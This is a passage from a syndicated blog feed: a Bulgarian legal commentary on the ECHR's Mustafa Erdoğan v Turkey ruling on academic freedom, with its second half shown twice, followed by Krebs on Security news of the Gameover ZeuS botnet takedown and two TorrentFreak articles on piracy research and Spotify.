„. . . [A]кадемичната свобода на изследвания и обучение трябва да гарантира свободата на изразяване и на действие, свободата на разпространение на информация и свободата на провеждане на изследвания и разпространение на знания и истина без ограничения. . . .Затова практиката на Съда изисква всяко ограничение да бъде подложено на щателно и критично разглеждане. . . Тази свобода обаче не се ограничава само до академични или научни изследвания, а включва също и правото на академичните дейци на свобода да изразят свободно своите възгледи и мнения, дори когато те са спорни или непопулярни, в сферата на техните изследвания, професионални знания и компетенции. Това може да включва и разглеждането на функционирането на обществените институции на определена политическа система или критики срещу тях.” [aбз. 40]
Съдът приема, че възможностите за критиката срещу служебните действия на представителите на съдебната система са по-големи от тези на обикновените граждани. Едновременно с това, с оглед значението на съда в правовата държава, те трябва да бъдат защитени от атаки, които са неоснователни. Съдът отбелязва, че трябва да се направи разлика между критика и обида. Анализирайки използваните изрази, европейските съдии приемат, че те могат да бъдат възприети като обидни, но едновременно с това намира, че същите са оценъчни твърдения и се основават на факти – анализа на решението на Конституционния съд.
Съдът намира, че националните съдии не са направили разлика между фактически и оценъчни твърдения и не са оценили дали жалбоподателите са действали с оглед на своите задължения и отговорности и дали статията е публикувана добронамерено. Те не са изследвали въпросните изрази в контекста им – забраната на Партията на Добродетелността и разпаления дебат, който последвал от това – и по този начин са пропуснали да оценят правилно стиловите особености на речта. Съдът не намира, че е налице произволна лична атака над съдиите. С оглед това, европейските съдии заключават, че не са налице достатъчни основания за това, че вмешателството в свободата на изразяване е било необходимо в демократичното общество и приемат че е налице нарушение на член 10 от Конвенцията.
Съдиите Sajó, Vučinič и Kūris представят свои мотиви. Според тях, мнозинството не е изяснило концепцията и принципите на академичната свобода. Те отбелязват, че правото на академична свобода се отнася не само до дебати в научни издания, дебати в учебните институции и обучение. Тъй като това право е защитено от член 10 на Конвенцията, то обхваща както мненията, които академичните дейци разменят помежду си, така и тези, които те споделят пред широката публика.
Съдиите признават, че степента на защита на академичната свобода, особено по отношение на изразяването й пред широка публика, не може да бъде напълно обяснено чрез някое от известните основания за защита на свободата на изразяване. Значението, основанието и обхвата на академичната свобода като правна концепция не са установени, макар традиционно тя да се възприема като важен елемент на университетската автономия и автономията на учените.
Според тези съдии, гарантирането на академична свобода за споделяне на мнения пред широка публика не се обуславя само от нуждите на демократичното общество, но и заради развитието на познанието, знанието и науката. Тримата съдии посочват:

Няма “китайска стена” между науката и демократичното общество. Точно обратното, няма демократично общество без свободна наука и свободни учени. Тази взаимовръзка е особено силна в контекста на социалните науки и правото, където научният дискурс спомага за информирането на обществото за отнасящи се до него теми, включително тези, които се отнасят пряко до управлението и политиката. . . Принципно погледнато, приносът на социалните и правните изследвания към обществения дебат и мненията, които университетските дейци споделят пред широката публика на основата на своите изследвания, професионални познания и компетентност, изисква най-висока степен на защита от член 10.

Съдиите смятат, че защитата на свободата на изразяване зависи от това дали съществува “академичен елемент” в коментарите или изявленията, които засягат лични права. Тъй като до този момент Европейският съд не се е произнасял как да бъде определяно дали се касае за упражняване на академична свобода или свобода на изразяване, тримата съдии предлагат тест за оценка. Той включва следните елементи: а) дали изявлението е направено от университетски деятел?, b) дали изявленията се отнасят към изследванията на въпросното лице?, c) дали заключенията или мненията са основани на професионалните познания и компетентност на конкретното лице?. Ако са налице тези условия, спорното твърдение се ползва с най-голяма защита от страна на член 10. Къде и как е била направено твърдението има вторично допълнително значение и понякога това не е от решително значение.
Тримата съдии отдават значение на фактът, че изявленията са направени от професор по конституционно право в негов научен анализ на решение на конституционния съд. Професорът е изразил мнението си за личността на някои съдии на основата на своя професионален анализ. Според съдиите това е информирано мнение – не в смисъл, че е фактически правилно, а бе почива на изследване и факти. Националните съдилища са направили грешка като не са взели предвид тези особености при анализа на пропорционалността на вмешателството.

Коментар

Европейският съд доразвива концепцията за академичната свобода, приемайки, че тази свобода се отнася не само до обмяна на мнение между академични дейци, но и в случаите, когато последните споделят професионалното си мнение пред широката публика. Всички съдии са на мнение, че академичната свобода се ползва с най-висока защита от член 10. В мотивите на трима от съдиите предлага тест за разграничение между академична свобода и свобода на изразяване.
Макар Съдът да препраща към теста от делото Axel Sringer AG v Germany за баланс между правото на свобода на изразяване и правото на добро име, анализът на решението показва, че акцентът е върху характера на речта, а не върху частите на въпросния тест. Ако речта е израз на академична свобода, Съдът счита, че балансът между правото на свободата на изразяване и правото на добро име клони към първото. Ако е налице оценъчно твърдение, за Съда е от значение дали то почива на факти. В този смисъл е налице потвърждаване на теста от делото Лингенс срещу Австрия.
По отношение на академичната свобода заслужават да бъдат споменати препратките на Съда към Препоръка CM/Rec (2012)7 на Комитета на Министрите на Съвета на Европа, отнасяща се до отговорността на публичните органи по отношение на академичната свобода и университетската автономия и Препоръка R (2000) 8 на Комитета на Министри на Съвета на Европа за изследователската мисия на университетите и Препоръка 1762 (2006) на Парламентарната Асамблея на Европа за академичната свобода и университетска автономия.
За отбелязване е, че академичната свобода е гарантирана от член 13 от Хартата за Основни права на Европейския съюз, която за разлика от член 10 от Конвенцията изрично защитава свободата на изкуствата и на науките: “Изкуствата и научните изследвания са свободни. Академичната свобода се зачита.”

Изследване на понятието и значението на академичната свобода вижте също:
J. VRIELINK, P. LEMMENS, S. PARMENTIER and the LERU working group on Human Rights, Academic Freedom as a Fundamental Right

League of European Research Universities, Leuven, 2010.


 

Материалът е предоставен от автора за блога Медийно право.

Боев, Б. ЕСПЧ: за академичната свобода и правото да се критикуват решения на съда. (2 юни 2014). в: Медийно право:  https://nellyo.wordpress.com/2014/06/02/echr-15/




[Медийно право] [Нели Огнянова]: ЕСПЧ: за академичната свобода и правото да се критикуват решения на съда

This post was syndicated from: [Медийно право] [Нели Огнянова] and was written by: nellyo. Original post: at [Медийно право] [Нели Огнянова]

boyko_boev

Бойко Боев (Софийски университет, 2000 u  Columbia University School of Law, New York 2004) е юрист, старши експерт в Article 19. Специалист по медийно регулиране, обществени медии, клевета и прозрачност на собствеността на медиите. Анализира медийни закони от около 20 страни от Европа, Близкия Изток, Африка и Азия за тяхното съответствие с международното право и стандартите в областта на свободата на изразяване.  Има опит като адвокат в областта на  правата на човека.


*

На 27 май 2014 г. втори състав на Европейският съд за правата на човека се произнесе по дело Mustafa Erdoğan and others v Turkey , касаещо академичната свободата и правото да се критикуват решения на съда. Решението обяснява връзките между „академична свобода“ и „свобода на изразяване“ и подчертава, че „академичната свобода“ са ползва с най-голяма защита дори когато става дума за споделяне на мнения пред широката аудитория. Макар че Съдът отново подчерта, че защитата на доброто име на съдиите е важно за функционирането на правовата държава, в това дело е защитено правото на мнение на професор по конституционно право, който счита, че конституционните съдии в Турция са некомпетентни и политически зависими.

Делото

Жалбата в Страсбург е подадена от турски професор по конституционно право и от редактора и издателя на списание, които се оплакват от осъждане за клевета и обида. Поводът е публикация на професора, в която той критикува решението на конституционния съд за закриване на политическата партия на Добродетелта.
Припомняме, че въпросната партия беше парламентарно представена в края на деветдесетте. Тъй като тя беше ислямистка, участието й в политиката беше възприемано като предизвикателство за светските устои на турската държава. Някои изказвания на нейни членове и отказът на заместник-председателката й да заседава в парламента без забрадка имаха силен обществен отзвук.

През 2001 г. по искане на прокуратурата Конституционният съд закри партията и ограничи правото на нейни членове да участват в политическия живот, намирайки противоречия с разпоредбите на конституцията, които защитават светската власт в страната.
Решението на Конституционния съд, което било очаквано с нетърпение от обществото в продължение на няколко години, предизвиква широко обсъждане. Професорът по конституционно право се включва в този дебат като пише статия, в която критикува решението като излага правни и политически аргументи за това, позовавайки се включително на практиката на Европейския съд. След публикацията всички конституционни съдии подават граждански иск срещу автора, редактора и издателя на списанието, твърдейки, че статията е засегнала честта и достойнството им като съдии.
Първоинстанционният съд в Анкара намира, че правото на добро име на конституционните съдии е било нарушени, посочвайки части в статията, в които авторът говори за натиск върху съда от страна на военните в Турция и поставя под въпрос професионалните качества и интелектуални възможности на съдиите. Ответниците са осъдени да платят обезщетение. Тази присъда е потвърдена от второинстанционния съд.

Решение

Европейският съд намира, че е налице вмешателство в правото на жалбоподателите на свобода на изразяване и че то е основано на закона и преследва законосъобразна цел – защита на достойнството и правата на другите.
Въпросът, който съдиите изследват, е дали въпросното вмешателство е било „необходимо в демократичното общество“. Съдът изтъква, че свободата на изразяване е една от главните основи на демократичното общество и едно от основните условия за неговия прогрес и за личното развитие на всеки човек. Това право се прилага към идеи и информация, които са обидни, шокиращи или смущаващи. Съдът подчертава, че трябва да се прави разлика между фактически и оценъчни твърдения. Признавайки свободата на националните органи на преценка, европейските съдии изследват доколко първите са установили справедлив баланс между правото на свобода на изразяване и достойнство.

Съдът отбелязва, че критерият за баланс между двете права е установен в делото Axel Sringer AG v Germany. От значение са:

1.) допринася ли словото към дебат от обществен интерес?,

2.) колко познато е засегното лице и какъв е предметът на публикацията?,

3.) какво е било поведението на засегнатото лице?,

4.) какъв е бил методът за получаване на информацията и нейната проверка?,

5.) какви са съдържанието, формата и последиците от публикацията?,

6.) каква е тежестта на наложената санкция.
Съдът намира, че предметът на публикацията – функционирането на съдебната система – е от обществен интерес. Статията допринася за съществуващия обществен дебат. Засегнати са правата на съдии, чиято професионална компетентност и независимост са поставени под въпрос. Едновременно с това Съдът отбелязва, че авторът на публикацията е професор по право и като такъв е изразил академичната си свобода. Съдът посочва:
„. . . [A]кадемичната свобода на изследвания и обучение трябва да гарантира свободата на изразяване и на действие, свободата на разпространение на информация и свободата на провеждане на изследвания и разпространение на знания и истина без ограничения. . . .Затова практиката на Съда изисква всяко ограничение да бъде подложено на щателно и критично разглеждане. . . Тази свобода обаче не се ограничава само до академични или научни изследвания, а включва също и правото на академичните дейци на свобода да изразят свободно своите възгледи и мнения, дори когато те са спорни или непопулярни, в сферата на техните изследвания, професионални знания и компетенции. Това може да включва и разглеждането на функционирането на обществените институции на определена политическа система или критики срещу тях.” [aбз. 40]
Съдът приема, че възможностите за критиката срещу служебните действия на представителите на съдебната система са по-големи от тези на обикновените граждани. Едновременно с това, с оглед значението на съда в правовата държава, те трябва да бъдат защитени от атаки, които са неоснователни. Съдът отбелязва, че трябва да се направи разлика между критика и обида. Анализирайки използваните изрази, европейските съдии приемат, че те могат да бъдат възприети като обидни, но едновременно с това намира, че същите са оценъчни твърдения и се основават на факти – анализа на решението на Конституционния съд.
Съдът намира, че националните съдии не са направили разлика между фактически и оценъчни твърдения и не са оценили дали жалбоподателите са действали с оглед на своите задължения и отговорности и дали статията е публикувана добронамерено. Те не са изследвали въпросните изрази в контекста им – забраната на Партията на Добродетелността и разпаления дебат, който последвал от това – и по този начин са пропуснали да оценят правилно стиловите особености на речта. Съдът не намира, че е налице произволна лична атака над съдиите. С оглед това, европейските съдии заключават, че не са налице достатъчни основания за това, че вмешателството в свободата на изразяване е било необходимо в демократичното общество и приемат че е налице нарушение на член 10 от Конвенцията.
Съдиите Sajó, Vučinič и Kūris представят свои мотиви. Според тях, мнозинството не е изяснило концепцията и принципите на академичната свобода. Те отбелязват, че правото на академична свобода се отнася не само до дебати в научни издания, дебати в учебните институции и обучение. Тъй като това право е защитено от член 10 на Конвенцията, то обхваща както мненията, които академичните дейци разменят помежду си, така и тези, които те споделят пред широката публика.
Съдиите признават, че степента на защита на академичната свобода, особено по отношение на изразяването й пред широка публика, не може да бъде напълно обяснено чрез някое от известните основания за защита на свободата на изразяване. Значението, основанието и обхвата на академичната свобода като правна концепция не са установени, макар традиционно тя да се възприема като важен елемент на университетската автономия и автономията на учените.
Според тези съдии, гарантирането на академична свобода за споделяне на мнения пред широка публика не се обуславя само от нуждите на демократичното общество, но и заради развитието на познанието, знанието и науката. Тримата съдии посочват:

Няма “китайска стена” между науката и демократичното общество. Точно обратното, няма демократично общество без свободна наука и свободни учени. Тази взаимовръзка е особено силна в контекста на социалните науки и правото, където научният дискурс спомага за информирането на обществото за отнасящи се до него теми, включително тези, които се отнасят пряко до управлението и политиката. . . Принципно погледнато, приносът на социалните и правните изследвания към обществения дебат и мненията, които университетските дейци споделят пред широката публика на основата на своите изследвания, професионални познания и компетентност, изисква най-висока степен на защита от член 10.

Съдиите смятат, че защитата на свободата на изразяване зависи от това дали съществува “академичен елемент” в коментарите или изявленията, които засягат лични права. Тъй като до този момент Европейският съд не се е произнасял как да бъде определяно дали се касае за упражняване на академична свобода или свобода на изразяване, тримата съдии предлагат тест за оценка. Той включва следните елементи: а) дали изявлението е направено от университетски деятел?, b) дали изявленията се отнасят към изследванията на въпросното лице?, c) дали заключенията или мненията са основани на професионалните познания и компетентност на конкретното лице?. Ако са налице тези условия, спорното твърдение се ползва с най-голяма защита от страна на член 10. Къде и как е била направено твърдението има вторично допълнително значение и понякога това не е от решително значение.
Тримата съдии отдават значение на фактът, че изявленията са направени от професор по конституционно право в негов научен анализ на решение на конституционния съд. Професорът е изразил мнението си за личността на някои съдии на основата на своя професионален анализ. Според съдиите това е информирано мнение – не в смисъл, че е фактически правилно, а бе почива на изследване и факти. Националните съдилища са направили грешка като не са взели предвид тези особености при анализа на пропорционалността на вмешателството.

Коментар

Европейският съд доразвива концепцията за академичната свобода, приемайки, че тази свобода се отнася не само до обмяна на мнение между академични дейци, но и в случаите, когато последните споделят професионалното си мнение пред широката публика. Всички съдии са на мнение, че академичната свобода се ползва с най-висока защита от член 10. В мотивите на трима от съдиите предлага тест за разграничение между академична свобода и свобода на изразяване.
Макар Съдът да препраща към теста от делото Axel Sringer AG v Germany за баланс между правото на свобода на изразяване и правото на добро име, анализът на решението показва, че акцентът е върху характера на речта, а не върху частите на въпросния тест. Ако речта е израз на академична свобода, Съдът счита, че балансът между правото на свободата на изразяване и правото на добро име клони към първото. Ако е налице оценъчно твърдение, за Съда е от значение дали то почива на факти. В този смисъл е налице потвърждаване на теста от делото Лингенс срещу Австрия.
По отношение на академичната свобода заслужават да бъдат споменати препратките на Съда към Препоръка CM/Rec (2012)7 на Комитета на Министрите на Съвета на Европа, отнасяща се до отговорността на публичните органи по отношение на академичната свобода и университетската автономия и Препоръка R (2000) 8 на Комитета на Министри на Съвета на Европа за изследователската мисия на университетите и Препоръка 1762 (2006) на Парламентарната Асамблея на Европа за академичната свобода и университетска автономия.
За отбелязване е, че академичната свобода е гарантирана от член 13 от Хартата за Основни права на Европейския съюз, която за разлика от член 10 от Конвенцията изрично защитава свободата на изкуствата и на науките: “Изкуствата и научните изследвания са свободни. Академичната свобода се зачита.”

Изследване на понятието и значението на академичната свобода вижте също:
J. VRIELINK, P. LEMMENS, S. PARMENTIER and the LERU working group on Human Rights, Academic Freedom as a Fundamental Right

League of European Research Universities, Leuven, 2010.


 

Материалът е предоставен от автора за блога Медийно право.

Боев, Б. ЕСПЧ: за академичната свобода и правото да се критикуват решения на съда. (2 юни 2014). в: Медийно право:  http://nellyo.wordpress.com/2014/06/02/echr-15/




Krebs on Security: ‘Operation Tovar’ Targets ‘Gameover’ ZeuS Botnet, CryptoLocker Scourge

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

The U.S. Justice Department is expected to announce today an international law enforcement operation to seize control over the Gameover ZeuS botnet, a sprawling network of hacked Microsoft Windows computers that currently infects an estimated 500,000 to 1 million compromised systems globally. Experts say PCs infected with Gameover are being harvested for sensitive financial and personal data, and rented out to an elite cadre of hackers for use in online extortion attacks, spam and other illicit moneymaking schemes.

This graphic, from 2012, shows the decentralized nature of P2P network connectivity of 23,196 PCs infected with Gameover.  Image: Dell SecureWorks

This graphic, from 2012, shows the decentralized nature of P2P network connectivity of 23,196 PCs infected with Gameover. Image: Dell SecureWorks

The sneak attack on Gameover, dubbed “Operation Tovar,” began late last week and is a collaborative effort by investigators at the FBI, Europol, and the UK’s National Crime Agency; security firms CrowdStrike, Dell SecureWorks, SymantecTrend Micro and McAfee; and academic researchers at VU University Amsterdam and Saarland University in Germany. News of the action first came to light in a blog post published briefly on Friday by McAfee, but that post was removed a few hours after it went online.

Gameover is based on code from the ZeuS Trojan, an infamous family of malware that has been used in countless online banking heists. Unlike ZeuS — which was sold as a botnet creation kit to anyone who had a few thousand dollars in virtual currency to spend — Gameover ZeuS has since October 2011 been controlled and maintained by a core group of hackers from Russia and Ukraine.

Those individuals are believed to have used the botnet in high-dollar corporate account takeovers that frequently were punctuated by massive distributed-denial-of-service (DDoS) attacks intended to distract victims from immediately noticing the thefts. According to the Justice Department, Gameover has been implicated in the theft of more than $100 million in account takeovers.

The curators of Gameover also have reportedly loaned out sections of their botnet to vetted third-parties who have used them for a variety of purposes. One of the most popular uses of Gameover has been as a platform for seeding infected systems with CryptoLocker, a nasty strain of malware that locks your most precious files with strong encryption until you pay a ransom demand.

According to a 2012 research paper published by Dell SecureWorks, the Gameover Trojan is principally spread via Cutwail, one of the world’s largest and most notorious spam botnets (for more on Cutwail and its origins and authors, see this post). These junk emails typically spoof trusted brands, including shipping and phone companies, online retailers, social networking sites and financial institutions. The email lures bearing Gameover often come in the form of an invoice, an order confirmation, or a warning about an unpaid bill (usually with a large balance due to increase the likelihood that a victim will click the link). The links in the email have been replaced with those of compromised sites that will silently probe the visitor’s browser for outdated plugins that can be leveraged to install malware.

It will be interesting to hear how the authorities and security researchers involved in this effort managed to gain control over the Gameover botnet, which uses an advanced peer-to-peer (P2P) mechanism to control and update the bot-infected systems.

The infection and peer-to-peer (P2P) communication mechanism of Gameover ZeuS. Image: Abuse.ch

The infection and peer-to-peer (P2P) communication mechanism of Gameover ZeuS. Image: Abuse.ch

The addition of the P2P component in Gameover is innovation designed to make it much more difficult for security experts, law enforcement or other Internet do-gooders to dismantle the botnet. In March 2012, Microsoft used a combination of legal maneuvering and surprise to take down dozens of botnets powered by ZeuS (and its code-cousin — SpyEye), by seizing control over the domain names that the bad guys used to control the individual ZeuS botnets.

But Gameover would be far trickier to disrupt or wrest from its creators: It uses a tiered, decentralized system of intermediary proxies and strong encryption to hide the location of servers that the botnet masters use to control the crime machine.

“Microsoft’s 2012 takedown action had no effect on the P2P version of ZeuS because of its network architecture,” reads Dell SecureWorks’s 2012 paper on Gameover. “In the P2P model of ZeuS, each infected client maintains a list of other infected clients. These peers act a massive proxy network between the P2P ZeuS botnet operators and the infected hosts. The peers are used to propagate binary updates, to distribute configuration files, and to send stolen data to the controllers.”

According to McAfee, the seizure of Gameover is expected to coincide with a cleanup effort in which Internet service providers contact affected customers to help remediate compromised PCs. The Department of Homeland Security’s U.S. Computer Emergency Readiness Team (US-CERT) today published a list of resources that may help in that effort.

Update, 11:07 a.m. ET: The Justice Department just published a complaint (PDF) that names the alleged author of the ZeuS Trojan, allegedly a Russian citizen named Evgeniy Mikhailovich Bogachev. The complaint mentions something that this blog has noted on several occasions - that the the ZeuS author used multiple nicknames, including “Slavik” and “Pollingsoon.” More court documents related to today’s action are available here.

Yevgeniy Bogachev, Evgeniy Mikhaylovich Bogachev, a.k.a. "lucky12345", "slavik", "Pollingsoon". Source: FBI.gov "most wanted, cyber.

Yevgeniy Bogachev, Evgeniy Mikhaylovich Bogachev, a.k.a. “lucky12345″, “slavik”, “Pollingsoon”. Source: FBI.gov “most wanted, cyber.

TorrentFreak: Research Links Piracy to Internet Addiction and Deviant Friends

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

cassetteOver the past decade a lot of research has looked at the effects of online piracy, particularly on the revenues of various entertainment industries.

Increasingly researchers are also examining the sociological links, causes and effects of copyright infringement. A new study conducted by Tennessee Tech University’s Jordana Navarro is a good example.

With a large survey Navarro and her colleagues investigated the link between piracy, internet addiction and deviant tendencies. The results were published in an article titled “Addicted to pillaging in cyberspace: Investigating the role of internet addiction in digital piracy,” which appears in the latest issue of the Computers and Human Behavior journal.

The researchers conducted a large-scale survey among 1,617 students from 9th through 12th grade. The participants were asked a wide range of questions, covering their piracy habits, as well as scales to measure Internet addiction and association with deviant friends.

The findings on the piracy side are comparable to many previous studies and show that movie piracy is most prevalent. Nearly 30% of the students admitted to pirating movies, and this percentage went down to 15% and 13% for music and software piracy respectively.

One of the more interesting findings is the link between piracy and Internet addiction. Here, the researchers found that students who have more internet addiction related issues are more likely to pirate software.

“Based on the results of the study, we can determine that high school students who have Internet-related problems due to addiction are more likely to commit a specific form of piracy involving the illegal downloading of software,” the researchers write.

The same group of software pirates were also more likely to hang out with deviant friends. This measure includes friends who pirate, those who threaten others with violence online, those who send nude pictures, and those who have used another person’s credit card or ID without permission.

“Not surprisingly, youth who committed this form of piracy were also more likely to have deviant peers. In other words, their behaviors were influenced by friends who committed similar or other deviant acts,” the researchers conclude.

Interestingly, the link between Internet addiction and copyright infringement was only found for software piracy. High school students who pirated movies and music were not more likely to have these type of problems. They were, however, more likely to associate with deviant or criminal friends.

“The remaining two forms of piracy for juveniles are not predicted by Internet addiction based on our findings. However, the results did support past findings that deviant peer association and piracy behaviors are significant related,” the researchers write.

According to the researchers the results are a good first step in identifying how various problems and deviant behaviors are linked, which could be helpful to shape future educational efforts.

Unfortunately, the paper doesn’t offer any explanations for the differences in the link between Internet addiction and various types of piracy. One likely explanation is that those who show more signs of Internet addiction simply spend more time on the computer, and are therefore more interested in software piracy and software in general.

For now, it appears that some more follow-up research is needed before it’s warranted to send the first batch of kids to piracy rehab.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.

TorrentFreak: Spotify: We Make Revenue From Pirates Who Never Pay

This post was syndicated from: TorrentFreak and was written by: Andy. Original post: at TorrentFreak

In the continuing piracy debate one thing has been established beyond reasonable doubt. If an entertainment producer wants to make any dent in piracy, at the very least they’re going to have to make their products readily available at a fair price.

This argument has gathered serious momentum in Australia during the past few years, with local consumers regularly criticizing international TV and movie companies for shipping products Down Under months after release and then charging unrealistic prices.

But in a recent opinion piece, the principal analyst at local music royalty collection outfit APRA AMCOS disputed whether the arrival of services like Spotify that give consumers what they want, have actually done anything to reduce piracy rates.

“Music’s had everything everybody now wants for television shows, such as Game of Thrones, for a couple of years: availability, access and a reasonable price. But the piracy issue still has not been solved,” Andrew Harris wrote.

“In fact, results last month from our ongoing national research show that music piracy levels – just as they were almost two years ago – still sit at around the same level as that of movies and television shows.”

Noting that Spotify offers content in Australia at the moment it’s released around the world and does so at one of the best prices, Harris arrives at a familiar conclusion.

“We’ve heard it all before. No matter how loud the minority might shout it in anger as the answer, it’s impossible to compete with free.”

Unsurprisingly that notion doesn’t sit well with Spotify, a company that was designed from the ground up to compete with piracy.

Responding to Harris’s assertions in Australian Financial Review, Spotify Australia and New Zealand chief Kate Vale said that the company’s experiences told a different story.

“We do believe that access, availability and price does contribute and is the answer and we have proven this in other markets across Europe and particularly in Sweden where we have seen a 30 per cent reduction in piracy since we launched about six years ago,” Vale said.

Cracking Sweden was undoubtedly a major feat given the country’s long association with Internet piracy and Vale believes that Spotify now has the right formula to attract the most aggressive file-sharers – and make money from them.

“If you look at the main audience that is on Spotify, a lot of them are former pirates. There are teenagers who have potentially never paid for their music before, and probably never will,” she said.

“If we can get them on to a service that is free but legal, and they are contributing through our advertising on that free tier, then it is giving money back into the industry that they are just never going to get before.”

The ad-supported tier of Spotify is undoubtedly a great incentive to get people to try the service. Globally the company says that it converts around a quarter of free users to premium subscribers but Australia actually tops that with 31%, suggesting that Aussies are happier than most to part with their hard-earned cash in exchange for a good product.

Source: TorrentFreak, for the latest info on copyright, file-sharing and anonymous VPN services.